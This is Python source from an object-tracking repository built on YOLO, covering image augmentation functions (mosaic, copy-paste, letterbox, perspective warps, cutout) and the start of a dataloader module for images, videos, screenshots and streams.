perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def load_samples(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
#img4, labels4, segments4 = remove_background(img4, labels4, segments4)
sample_labels, sample_images, sample_masks = sample_segments(img4, labels4, segments4, probability=0.5)
return sample_labels, sample_images, sample_masks
def copy_paste(img, labels, segments, probability=0.5):
# Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy)
n = len(segments)
if probability and n:
h, w, c = img.shape # height, width, channels
im_new = np.zeros(img.shape, np.uint8)
for j in random.sample(range(n), k=round(probability * n)):
l, s = labels[j], segments[j]
box = w - l[3], l[2], w - l[1], l[4]
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
if (ioa < 0.30).all(): # allow 30% obscuration of existing labels
labels = np.concatenate((labels, [[l[0], *box]]), 0)
segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1))
cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
result = cv2.bitwise_and(src1=img, src2=im_new)
result = cv2.flip(result, 1) # augment segments (flip left-right)
i = result > 0 # pixels to replace
# i[:, :] = result.max(2).reshape(h, w, 1) # act over ch
img[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
return img, labels, segments
def remove_background(img, labels, segments):
# Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy)
n = len(segments)
h, w, c = img.shape # height, width, channels
im_new = np.zeros(img.shape, np.uint8)
img_new = np.ones(img.shape, np.uint8) * 114
for j in range(n):
cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
result = cv2.bitwise_and(src1=img, src2=im_new)
i = result > 0 # pixels to replace
img_new[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
return img_new, labels, segments
def sample_segments(img, labels, segments, probability=0.5):
# Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy)
n = len(segments)
sample_labels = []
sample_images = []
sample_masks = []
if probability and n:
h, w, c = img.shape # height, width, channels
for j in random.sample(range(n), k=round(probability * n)):
l, s = labels[j], segments[j]
box = l[1].astype(int).clip(0,w-1), l[2].astype(int).clip(0,h-1), l[3].astype(int).clip(0,w-1), l[4].astype(int).clip(0,h-1)
#print(box)
if (box[2] <= box[0]) or (box[3] <= box[1]):
continue
sample_labels.append(l[0])
mask = np.zeros(img.shape, np.uint8)
cv2.drawContours(mask, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED)
sample_masks.append(mask[box[1]:box[3],box[0]:box[2],:])
result = cv2.bitwise_and(src1=img, src2=mask)
i = result > 0 # pixels to replace
mask[i] = result[i] # cv2.imwrite('debug.jpg', img) # debug
#print(box)
sample_images.append(mask[box[1]:box[3],box[0]:box[2],:])
return sample_labels, sample_images, sample_masks
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1.1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def pastein(image, labels, sample_labels, sample_images, sample_masks):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
# create random masks
scales = [0.75] * 2 + [0.5] * 4 + [0.25] * 4 + [0.125] * 4 + [0.0625] * 6 # image size fraction
for s in scales:
if random.random() < 0.2:
continue
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
if len(labels):
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
else:
ioa = np.zeros(1)
if (ioa < 0.30).all() and len(sample_labels) and (xmax > xmin+20) and (ymax > ymin+20): # allow 30% obscuration of existing labels
sel_ind = random.randint(0, len(sample_labels)-1)
#print(len(sample_labels))
#print(sel_ind)
#print((xmax-xmin, ymax-ymin))
#print(image[ymin:ymax, xmin:xmax].shape)
#print([[sample_labels[sel_ind], *box]])
#print(labels.shape)
hs, ws, cs = sample_images[sel_ind].shape
r_scale = min((ymax-ymin)/hs, (xmax-xmin)/ws)
r_w = int(ws*r_scale)
r_h = int(hs*r_scale)
if (r_w > 10) and (r_h > 10):
r_mask = cv2.resize(sample_masks[sel_ind], (r_w, r_h))
r_image = cv2.resize(sample_images[sel_ind], (r_w, r_h))
temp_crop = image[ymin:ymin+r_h, xmin:xmin+r_w]
m_ind = r_mask > 0
if m_ind.astype(np.int).sum() > 60:
temp_crop[m_ind] = r_image[m_ind]
#print(sample_labels[sel_ind])
#print(sample_images[sel_ind].shape)
#print(temp_crop.shape)
box = np.array([xmin, ymin, xmin+r_w, ymin+r_h], dtype=np.float32)
if len(labels):
labels = np.concatenate((labels, [[sample_labels[sel_ind], *box]]), 0)
else:
labels = np.array([[sample_labels[sel_ind], *box]])
image[ymin:ymin+r_h, xmin:xmin+r_w] = temp_crop
return labels
class Albumentations:
# YOLOv5 Albumentations class (optional, only used if package is installed)
def __init__(self):
self.transform = None
import albumentations as A
self.transform = A.Compose([
A.CLAHE(p=0.01),
A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.2, p=0.01),
A.RandomGamma(gamma_limit=[80, 120], p=0.01),
A.Blur(p=0.01),
A.MedianBlur(p=0.01),
A.ToGray(p=0.01),
A.ImageCompression(quality_lower=75, p=0.01),],
bbox_params=A.BboxParams(format='pascal_voc', label_fields=['class_labels']))
#logging.info(colorstr('albumentations: ') + ', '.join(f'{x}' for x in self.transform.transforms if x.p))
def __call__(self, im, labels, p=1.0):
if self.transform and random.random() < p:
new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed
im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])])
return im, labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
def load_segmentations(self, index):
key = '/work/handsomejw66/coco17/' + self.img_files[index]
#print(key)
# /work/handsomejw66/coco17/
return self.segs[key] | 56,226 | Python | .py | 1,086 | 40.577348 | 139 | 0.548081 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,102 | dataloaders.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/dataloaders.py | import contextlib
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import numpy as np
import psutil
import torch
import torch.nn.functional as F
import torchvision
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import (Albumentations, augment_hsv, classify_albumentations, classify_transforms, copy_paste,
letterbox, mixup, random_perspective)
from utils.general import (DATASETS_DIR, LOGGER, NUM_THREADS, TQDM_BAR_FORMAT, check_dataset, check_requirements,
check_yaml, clean_str, cv2, is_colab, is_kaggle, segments2boxes, unzip_file, xyn2xy,
xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'See https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp', 'pfm' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
LOCAL_RANK = int(os.getenv('LOCAL_RANK', -1)) # https://pytorch.org/docs/stable/elastic/run.html
RANK = int(os.getenv('RANK', -1))
PIN_MEMORY = str(os.getenv('PIN_MEMORY', True)).lower() == 'true' # global pin_memory for dataloaders
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
with contextlib.suppress(Exception):
rotation = dict(img._getexif().items())[orientation]
if rotation in [6, 8]: # rotation 270 or 90
s = (s[1], s[0])
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def seed_worker(worker_id):
# Set dataloader worker seed https://pytorch.org/docs/stable/notes/randomness.html#dataloader
worker_seed = torch.initial_seed() % 2 ** 32
np.random.seed(worker_seed)
random.seed(worker_seed)
def create_dataloader(path,
imgsz,
batch_size,
stride,
single_cls=False,
hyp=None,
augment=False,
cache=False,
pad=0.0,
rect=False,
rank=-1,
workers=8,
image_weights=False,
close_mosaic=False,
quad=False,
min_items=0,
prefix='',
shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING ⚠️ --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(
path,
imgsz,
batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
min_items=min_items,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
#loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
loader = DataLoader if image_weights or close_mosaic else InfiniteDataLoader
generator = torch.Generator()
generator.manual_seed(6148914691236517205 + RANK)
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=PIN_MEMORY,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn,
worker_init_fn=seed_worker,
generator=generator), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for _ in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadScreenshots:
# YOLOv5 screenshot dataloader, i.e. `python detect.py --source "screen 0 100 100 512 256"`
def __init__(self, source, img_size=640, stride=32, auto=True, transforms=None):
# source = [screen_number left top width height] (pixels)
check_requirements('mss')
import mss
source, *params = source.split()
self.screen, left, top, width, height = 0, None, None, None, None # default to full screen 0
if len(params) == 1:
self.screen = int(params[0])
elif len(params) == 4:
left, top, width, height = (int(x) for x in params)
elif len(params) == 5:
self.screen, left, top, width, height = (int(x) for x in params)
self.img_size = img_size
self.stride = stride
self.transforms = transforms
self.auto = auto
self.mode = 'stream'
self.frame = 0
self.sct = mss.mss()
# Parse monitor shape
monitor = self.sct.monitors[self.screen]
self.top = monitor["top"] if top is None else (monitor["top"] + top)
self.left = monitor["left"] if left is None else (monitor["left"] + left)
self.width = width or monitor["width"]
self.height = height or monitor["height"]
self.monitor = {"left": self.left, "top": self.top, "width": self.width, "height": self.height}
def __iter__(self):
return self
def __next__(self):
# mss screen capture: get raw pixels from the screen as np array
im0 = np.array(self.sct.grab(self.monitor))[:, :, :3] # [:, :, :3] BGRA to BGR
s = f"screen {self.screen} (LTWH): {self.left},{self.top},{self.width},{self.height}: "
if self.transforms:
im = self.transforms(im0) # transforms
else:
im = letterbox(im0, self.img_size, stride=self.stride, auto=self.auto)[0] # padded resize
im = im.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
im = np.ascontiguousarray(im) # contiguous
self.frame += 1
return str(self.screen), im, im0, None, s # screen, img, original img, im0s, s
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True, transforms=None, vid_stride=1):
files = []
for p in sorted(path) if isinstance(path, (list, tuple)) else [path]:
p = str(Path(p).resolve())
if '*' in p:
files.extend(sorted(glob.glob(p, recursive=True))) # glob
elif os.path.isdir(p):
files.extend(sorted(glob.glob(os.path.join(p, '*.*')))) # dir
elif os.path.isfile(p):
files.append(p) # files
else:
raise FileNotFoundError(f'{p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
self.transforms = transforms # optional
self.vid_stride = vid_stride # video frame-rate stride
if any(videos):
self._new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
for _ in range(self.vid_stride):
self.cap.grab()
ret_val, im0 = self.cap.retrieve()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
path = self.files[self.count]
self._new_video(path)
ret_val, im0 = self.cap.read()
self.frame += 1
# im0 = self._cv2_rotate(im0) # for use if cv2 autorotation is False
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
im0 = cv2.imread(path) # BGR
assert im0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
if self.transforms:
im = self.transforms(im0) # transforms
else:
im = letterbox(im0, self.img_size, stride=self.stride, auto=self.auto)[0] # padded resize
im = im.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
im = np.ascontiguousarray(im) # contiguous
return path, im, im0, self.cap, s
def _new_video(self, path):
# Create a new video capture object
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT) / self.vid_stride)
self.orientation = int(self.cap.get(cv2.CAP_PROP_ORIENTATION_META)) # rotation degrees
# self.cap.set(cv2.CAP_PROP_ORIENTATION_AUTO, 0) # disable https://github.com/ultralytics/yolov5/issues/8493
def _cv2_rotate(self, im):
# Rotate a cv2 video manually
if self.orientation == 0:
return cv2.rotate(im, cv2.ROTATE_90_CLOCKWISE)
elif self.orientation == 180:
return cv2.rotate(im, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif self.orientation == 90:
return cv2.rotate(im, cv2.ROTATE_180)
return im
def __len__(self):
return self.nf # number of files
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True, transforms=None, vid_stride=1):
torch.backends.cudnn.benchmark = True # faster for fixed-size inference
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
self.vid_stride = vid_stride # video frame-rate stride
sources = Path(sources).read_text().rsplit() if os.path.isfile(sources) else [sources]
n = len(sources)
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if urlparse(s).hostname in ('www.youtube.com', 'youtube.com', 'youtu.be'): # if source is YouTube video
# YouTube format i.e. 'https://www.youtube.com/watch?v=Zgi9g1ksQHc' or 'https://youtu.be/Zgi9g1ksQHc'
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
if s == 0:
assert not is_colab(), '--source 0 webcam unsupported on Colab. Rerun command in a local environment.'
assert not is_kaggle(), '--source 0 webcam unsupported on Kaggle. Rerun command in a local environment.'
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
